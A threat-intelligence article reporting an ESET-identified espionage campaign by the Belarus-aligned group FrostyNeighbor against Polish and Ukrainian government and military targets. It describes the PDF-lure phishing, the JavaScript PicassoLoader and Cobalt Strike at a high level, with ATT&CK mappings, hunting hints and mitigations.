Belarusian APT 'FrostyNeighbor' Targets Poland and Ukraine with New Toolkit

Belarus-Aligned APT 'FrostyNeighbor' Deploys New JavaScript Loader in Attacks on Poland & Ukraine

HIGH
May 15, 2026
5m read
Threat ActorCyberattackThreat Intelligence

Related Entities

Threat Actors

FrostyNeighborGhostwriter UNC1151Storm-0257

Organizations

ESET

Other

PicassoLoaderCobalt Strike Ukrtelecom

MITRE ATT&CK Techniques

T1566.002

Spearphishing Link

T1204.002

Malicious File

T1059.007

JavaScript

T1608.004

Stage Capabilities

T1105

Ingress Tool Transfer

T1059.001

PowerShell

Full Report

Executive Summary

ESET Research has identified a new cyber-espionage campaign conducted by FrostyNeighbor, a sophisticated advanced persistent threat (APT) group aligned with Belarus. The group, also widely known as Ghostwriter or UNC1151, is targeting governmental and military entities in Poland and Ukraine. This latest campaign, active since at least March 2026, demonstrates a significant evolution in the group's tactics. They have shifted from macro-based attacks to using spear-phishing emails with PDF lures that link to malicious infrastructure. A key innovation is the deployment of a new JavaScript version of their PicassoLoader downloader, which is ultimately used to install the Cobalt Strike beacon for long-term intelligence gathering.

Threat Overview

Threat Actor: FrostyNeighbor, a state-sponsored group attributed to Belarus. This group is well-known and tracked under multiple aliases, including Ghostwriter, UNC1151, Storm-0257, and TA445. Their primary objective is cyber-espionage and information operations, historically targeting NATO countries and nations critical of the Belarusian and Russian regimes.

Targets: The current campaign specifically targets government and military organizations in Poland and Ukraine, continuing the group's focus on entities relevant to the geopolitical conflict in Eastern Europe.

Attack Vector: The campaign begins with spear-phishing emails (T1566.002 - Spearphishing Link). The emails contain blurry PDF attachments that act as lures, impersonating legitimate organizations like the Ukrainian telecommunications provider Ukrtelecom. These PDFs contain links that direct the victim to attacker-controlled infrastructure.

Technical Analysis

This campaign showcases FrostyNeighbor's continuous adaptation to bypass security defenses.

  1. Initial Lure: Instead of traditional macro-enabled documents, the attackers use simple PDF files with embedded links. This approach is designed to circumvent security solutions that are highly focused on blocking malicious macros.

  2. Server-Side Validation: A notable TTP is the use of server-side victim validation. When a victim clicks the link, the attacker's server performs fingerprinting on the connecting system. If the system does not match the profile of a desired target (e.g., it appears to be a sandbox or a security researcher's machine), the final payload is not delivered. This selective delivery (T1608.004 - Stage Capabilities) makes the campaign harder to analyze and increases its operational security.

  3. Evolved Payload: For validated targets, the server delivers a new JavaScript-based version of PicassoLoader. This marks a shift from previous versions and is likely intended to evade signature-based detection. PicassoLoader acts as a downloader, responsible for fetching and executing the next stage of the attack.

  4. Final Payload: The ultimate goal is to deploy the Cobalt Strike beacon. This powerful post-exploitation framework provides the attackers with a wide range of capabilities for lateral movement, credential theft, and data exfiltration, enabling long-term espionage within the compromised network (T1059.001 - PowerShell, T1027 - Obfuscated Files or Information).

Impact Assessment

The primary goal of the FrostyNeighbor campaign is espionage. A successful breach of a government or military network in Poland or Ukraine could lead to:

  • Theft of Classified Information: Exfiltration of sensitive government documents, military plans, and intelligence reports.
  • Geopolitical Destabilization: The stolen information could be used for strategic advantage, to undermine diplomatic relations, or leaked as part of a disinformation campaign (a known tactic of Ghostwriter).
  • Long-Term Persistence: The use of Cobalt Strike allows the threat actor to establish a persistent foothold, providing continuous access to the compromised network for ongoing intelligence collection.

IOCs — Directly from Articles

No specific Indicators of Compromise (IPs, domains, hashes) were mentioned in the source articles.

Cyber Observables — Hunting Hints

Security teams may want to hunt for activity related to the FrostyNeighbor group. The following patterns could indicate related activity:

  • Email Security: Monitor for incoming emails containing PDF attachments with suspicious links, especially those impersonating known service providers like telecommunications companies.
  • Network Traffic: Look for outbound connections from user workstations to newly registered or uncategorized domains, which could be the C2 infrastructure for PicassoLoader or Cobalt Strike.
  • Endpoint Activity: Hunt for the execution of JavaScript files (.js) by wscript.exe or cscript.exe, especially if they are downloaded from the internet or initiated from a browser process. Monitor for PowerShell execution patterns associated with Cobalt Strike loaders.

Detection & Response

  • Email Filtering: Enhance email security gateways to scan PDFs for malicious links and to block emails from suspicious or newly registered domains.
  • Endpoint Detection (EDR): Use an EDR solution to monitor for suspicious script execution and process chains (e.g., Outlook.exe -> Acrobat.exe -> chrome.exe -> wscript.exe). D3FEND's Process Spawn Analysis is relevant here.
  • Network Egress Filtering: Restrict or monitor outbound connections to the internet from non-essential systems. Use a web proxy to inspect and control web traffic, blocking connections to known malicious or uncategorized sites.

Mitigation

  • User Training: (M1017) Educate users about the risks of clicking links in unsolicited emails and attachments, even if they appear to be simple PDF documents.
  • Application Control: (M1038) Where possible, use application control solutions to restrict the execution of scripting engines like wscript.exe and cscript.exe for most users.
  • Network Segmentation: (M1030) Segment networks to limit an attacker's ability to move laterally if an initial compromise occurs.
  • PowerShell Hardening: Constrain PowerShell language mode and enable robust script block logging to detect and prevent malicious PowerShell usage.

Timeline of Events

1
March 1, 2026
The latest wave of attacks by FrostyNeighbor against Poland and Ukraine begins.
2
May 15, 2026
This article was published

MITRE ATT&CK Mitigations

User Training

M1017enterprise

Train users to recognize and report phishing attempts, especially those using lures relevant to their work or region.

Restrict Web-Based Content

M1021enterprise

Use web proxies and DNS filtering to block access to newly registered or known malicious domains used for payload delivery.

Execution Prevention

M1038enterprise

Use application allowlisting to prevent the execution of unauthorized scripts and executables, including scripting engines like wscript.exe.

Antivirus/Antimalware

M1049enterprise

Ensure endpoint security solutions are up-to-date and configured to detect and block known loaders like PicassoLoader and post-exploitation frameworks like Cobalt Strike.

Timeline of Events

1
March 1, 2026

The latest wave of attacks by FrostyNeighbor against Poland and Ukraine begins.

Sources & References

'FrostyNeighbor' APT Carefully Targets Govt Orgs in Poland, Ukraine
Dark Reading (darkreading.com) May 14, 2026
Belarus-aligned FrostyNeighbor attacks Ukrainian government, again — ESET Research discovers
Markets Insider (marketscreener.com) May 14, 2026
'FrostyNeighbor' APT Carefully Targets Govt Orgs in Poland, Ukraine
BackBox News (backbox.org) May 14, 2026
'FrostyNeighbor' APT Carefully Targets Govt Orgs in Poland, Ukraine
Secure !t Inside (secureitinside.com) May 14, 2026

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)
LinkedIn

Tags

FrostyNeighborGhostwriterAPTBelarusUkrainePolandPicassoLoaderCobalt StrikeEspionage

📢 Share This Article

Help others stay informed about cybersecurity threats

🎯 MITRE ATT&CK Mapped

Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.

🧠 Enriched & Analyzed

Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.

🛡️ Actionable Guidance

Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.

🔗 STIX Visualizer

Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.

Sigma Generator

Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.